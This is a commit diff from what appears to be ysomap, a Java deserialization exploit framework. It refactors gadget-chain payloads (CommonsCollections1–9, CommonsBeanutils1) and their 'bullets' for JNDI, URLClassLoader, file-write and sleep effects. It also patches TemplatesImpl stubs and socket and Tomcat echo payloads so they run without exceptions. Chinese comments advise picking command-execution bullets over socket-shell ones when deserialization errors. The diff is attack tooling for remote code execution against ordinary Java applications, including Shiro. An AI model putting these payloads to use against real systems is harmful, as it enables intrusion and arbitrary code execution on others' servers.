fix TemplatesImpl's exception problem.

remove unuseful payload about commons-collections

core/src/main/java/ysomap/bullets/collections/TransformerWithTemplatesImplBullet.java

@@ -10,11 +10,12 @@
 
 /**
  * jdk.xml.enableTemplatesImplDeserialization=true
+ * 这个bullet不是很有必要
  * @author wh1t3P1g
  * @since 2020/2/17
  */
 @SuppressWarnings({"rawtypes"})
-@Bullets
+//@Bullets
 @Dependencies({"<=commons-collections 3.2.1", "<=commons-collections 4.0"})
 @Details("执行后，执行任意代码，依赖TemplatesImpl")
 @Authors({ Authors.WH1T3P1G })

core/src/main/java/ysomap/bullets/jdk/TemplatesImplBullet.java

@@ -129,6 +129,10 @@ public static class StubTransletPayload extends AbstractTranslet implements Seri
 
         private static final long serialVersionUID = -5971610431559700674L;
 
+        public StubTransletPayload(){
+            transletVersion = 101;
+        }
+
         public void transform (DOM document, SerializationHandler[] handlers ) throws TransletException {}
 
         @Override

core/src/main/java/ysomap/payloads/java/collections/CommonsBeanutils1.java

@@ -10,6 +10,10 @@
 import java.util.PriorityQueue;
 
 /**
+ * cb1的反序列化会报错
+ * 所以在选用bullet的时候，尽量选取报错也不会影响执行效果的类型
+ * 比如直接执行命令
+ * 比如运行socket shell的bullet就不太适合了
  * @author wh1t3P1g
  * @since 2020/5/14
  */
@@ -23,7 +27,12 @@ public class CommonsBeanutils1 extends AbstractPayload<Object> {
 
     @Override
     public Bullet getDefaultBullet(Object... args) throws Exception {
-        return new TemplatesImplBullet().set("body",args[0]);
+        Bullet bullet = new TemplatesImplBullet();
+        bullet.set("type", args[0]);
+        bullet.set("body", args[1]);
+        bullet.set("effect", args[2]);
+        bullet.set("exception", args[3]);
+        return bullet;
     }
 
     @Override

core/src/main/java/ysomap/payloads/java/collections/CommonsCollections1.java

@@ -5,7 +5,7 @@
 import org.apache.commons.collections.functors.ConstantTransformer;
 import org.apache.commons.collections.map.LazyMap;
 import ysomap.bullets.Bullet;
-import ysomap.bullets.collections.TransformerWithTemplatesImplBullet;
+import ysomap.bullets.collections.TransformerBullet;
 import ysomap.common.annotation.*;
 import ysomap.core.util.PayloadHelper;
 import ysomap.core.util.ReflectionHelper;
@@ -21,10 +21,14 @@
  * @since 2020/2/17
  */
 @SuppressWarnings({"rawtypes","unchecked"})
-@Payloads
+//@Payloads
 @Targets({Targets.JDK})
 @Authors({ Authors.FROHOFF })
-@Require(bullets = {"TransformerBullet","TransformerWithJNDIBullet","TransformerWithTemplatesImplBullet","TransformerWithResponseBullet"}, param = false)
+@Require(bullets = {"TransformerBullet",
+        "TransformerWithJNDIBullet",
+        "TransformerWithSleepBullet",
+        "TransformerWithURLClassLoaderBullet",
+        "TransformerWithFileWriteBullet"}, param = false)
 @Dependencies({"commons-collections:commons-collections:3.2.1","jdk7"})
 public class CommonsCollections1 extends AbstractPayload<InvocationHandler> {
 
@@ -35,8 +39,7 @@ public boolean checkObject(Object obj) {
 
     @Override
     public Bullet getDefaultBullet(Object... args) throws Exception {
-        return new TransformerWithTemplatesImplBullet()
-                .set("args",args[0]);
+        return new TransformerBullet().set("args",args[0]);
     }
 
     @Override

core/src/main/java/ysomap/payloads/java/collections/CommonsCollections2.java

@@ -17,7 +17,7 @@
  * @since 2020/2/17
  */
 @SuppressWarnings({"rawtypes","unchecked"})
-@Payloads
+//@Payloads
 @Targets({Targets.JDK})
 @Authors({ Authors.FROHOFF })
 @Require(bullets = {"TemplatesImplBullet"}, param = false)
@@ -31,7 +31,12 @@ public boolean checkObject(Object obj) {
 
     @Override
     public Bullet getDefaultBullet(Object... args) throws Exception {
-        return new TemplatesImplBullet().set("body", args[0]);
+        Bullet bullet = new TemplatesImplBullet();
+        bullet.set("type", args[0]);
+        bullet.set("body", args[1]);
+        bullet.set("effect", args[2]);
+        bullet.set("exception", args[3]);
+        return bullet;
     }
 
     @Override

core/src/main/java/ysomap/payloads/java/collections/CommonsCollections3.java

@@ -20,7 +20,11 @@
 @Payloads
 @Targets({Targets.JDK})
 @Authors({ Authors.FROHOFF })
-@Require(bullets = {"TransformerBullet","TransformerWithJNDIBullet","TransformerWithTemplatesImplBullet","TransformerWithResponseBullet"}, param = false)
+@Require(bullets = {"TransformerBullet",
+        "TransformerWithJNDIBullet",
+        "TransformerWithSleepBullet",
+        "TransformerWithURLClassLoaderBullet",
+        "TransformerWithFileWriteBullet"}, param = false)
 @Dependencies({"org.apache.commons:commons-collections4:4.0"})
 public class CommonsCollections3 extends CommonsCollections2 {
 

core/src/main/java/ysomap/payloads/java/collections/CommonsCollections4.java

@@ -43,10 +43,14 @@
 https://github.com/JetBrains/jdk8u_jdk/commit/af2361ee2878302012214299036b3a8b4ed36974#diff-f89b1641c408b60efe29ee513b3d22ffR70
  */
 @SuppressWarnings({"rawtypes"})
-@Payloads
+//@Payloads
 @Targets({Targets.JDK})
 @Authors({ Authors.MATTHIASKAISER, Authors.JASINNER })
-@Require(bullets = {"TransformerBullet","TransformerWithJNDIBullet","TransformerWithTemplatesImplBullet","TransformerWithResponseBullet"}, param = false)
+@Require(bullets = {"TransformerBullet",
+        "TransformerWithJNDIBullet",
+        "TransformerWithSleepBullet",
+        "TransformerWithURLClassLoaderBullet",
+        "TransformerWithFileWriteBullet"}, param = false)
 @Dependencies({"commons-collections:commons-collections:3.2.1, without security manager"})
 public class CommonsCollections4 extends AbstractPayload<BadAttributeValueExpException> {
 

core/src/main/java/ysomap/payloads/java/collections/CommonsCollections5.java

@@ -24,7 +24,11 @@
 @Payloads
 @Targets({Targets.JDK})
 @Authors({ Authors.MATTHIASKAISER })
-@Require(bullets = {"TransformerBullet","TransformerWithJNDIBullet","TransformerWithTemplatesImplBullet","TransformerWithResponseBullet"}, param = false)
+@Require(bullets = {"TransformerBullet",
+        "TransformerWithJNDIBullet",
+        "TransformerWithSleepBullet",
+        "TransformerWithURLClassLoaderBullet",
+        "TransformerWithFileWriteBullet"}, param = false)
 @Dependencies({"commons-collections:commons-collections:3.2.1"})
 public class CommonsCollections5 extends AbstractPayload<HashSet> {
 

core/src/main/java/ysomap/payloads/java/collections/CommonsCollections6.java

@@ -19,9 +19,13 @@
  * @since 2020/2/18
  */
 @SuppressWarnings({"rawtypes","unchecked"})
-@Payloads
+//@Payloads
 @Targets({Targets.JDK})
-@Require(bullets = {"TransformerBullet","TransformerWithJNDIBullet","TransformerWithTemplatesImplBullet","TransformerWithResponseBullet"}, param = false)
+@Require(bullets = {"TransformerBullet",
+        "TransformerWithJNDIBullet",
+        "TransformerWithSleepBullet",
+        "TransformerWithURLClassLoaderBullet",
+        "TransformerWithFileWriteBullet"}, param = false)
 @Dependencies({"commons-collections:commons-collections:3.2.1"})
 @Authors({Authors.SCRISTALLI, Authors.HANYRAX, Authors.EDOARDOVIGNATI})
 public class CommonsCollections6 extends AbstractPayload<Hashtable> {

core/src/main/java/ysomap/payloads/java/collections/CommonsCollections7.java

@@ -30,7 +30,12 @@ public boolean checkObject(Object obj) {
 
     @Override
     public Bullet getDefaultBullet(Object... args) throws Exception {
-        return new TemplatesImplBullet().set("body", args[0]);
+        Bullet bullet = new TemplatesImplBullet();
+        bullet.set("type", args[0]);
+        bullet.set("body", args[1]);
+        bullet.set("effect", args[2]);
+        bullet.set("exception", args[3]);
+        return bullet;
     }
 
     @Override

core/src/main/java/ysomap/payloads/java/collections/CommonsCollections8.java

@@ -23,7 +23,11 @@
 @Payloads
 @Targets({Targets.JDK})
 @Dependencies({"commons-collections:commons-collections:3.2.1"})
-@Require(bullets = {"TransformerBullet","TransformerWithJNDIBullet","TransformerWithTemplatesImplBullet","TransformerWithResponseBullet"}, param = false)
+@Require(bullets = {"TransformerBullet",
+        "TransformerWithJNDIBullet",
+        "TransformerWithSleepBullet",
+        "TransformerWithURLClassLoaderBullet",
+        "TransformerWithFileWriteBullet"}, param = false)
 @Authors({ Authors.WH1T3P1G })
 public class CommonsCollections8 extends AbstractPayload<Hashtable> {
 

core/src/main/java/ysomap/payloads/java/collections/CommonsCollections9.java

@@ -23,7 +23,7 @@
 @SuppressWarnings({"rawtypes","unchecked"})
 @Payloads
 @Targets({Targets.JDK})
-@Dependencies({"commons-collections:commons-collections:3.2.1","for shiro"})
+@Dependencies({"commons-collections:commons-collections:3.2.1","special for shiro"})
 @Require(bullets = {"TemplatesImplBullet"}, param = false)
 @Authors({ Authors.WH1T3P1G })
 public class CommonsCollections9 extends AbstractPayload<HashSet> {
@@ -35,7 +35,12 @@ public boolean checkObject(Object obj) {
 
     @Override
     public Bullet getDefaultBullet(Object... args) throws Exception {
-        return new TemplatesImplBullet().set("body", args[0]);
+        Bullet bullet = new TemplatesImplBullet();
+        bullet.set("type", args[0]);
+        bullet.set("body", args[1]);
+        bullet.set("effect", args[2]);
+        bullet.set("exception", args[3]);
+        return bullet;
     }
 
     @Override

thirdparty/src/main/java/echo/SocketEchoPayload.java

@@ -18,11 +18,11 @@
  */
 public class SocketEchoPayload extends AbstractTranslet implements Serializable, Runnable {
 
-
     private static String host;
     private static int port;
 
     public SocketEchoPayload(){
+        transletVersion = 101;
         new Thread(this).start();
     }
 

thirdparty/src/main/java/echo/TomcatEchoPayload.java

@@ -15,6 +15,7 @@
 public class TomcatEchoPayload extends AbstractTranslet implements Serializable {
 
     public TomcatEchoPayload() throws Exception {
+        transletVersion = 101;
         Object o;
         Object resp;
         String s;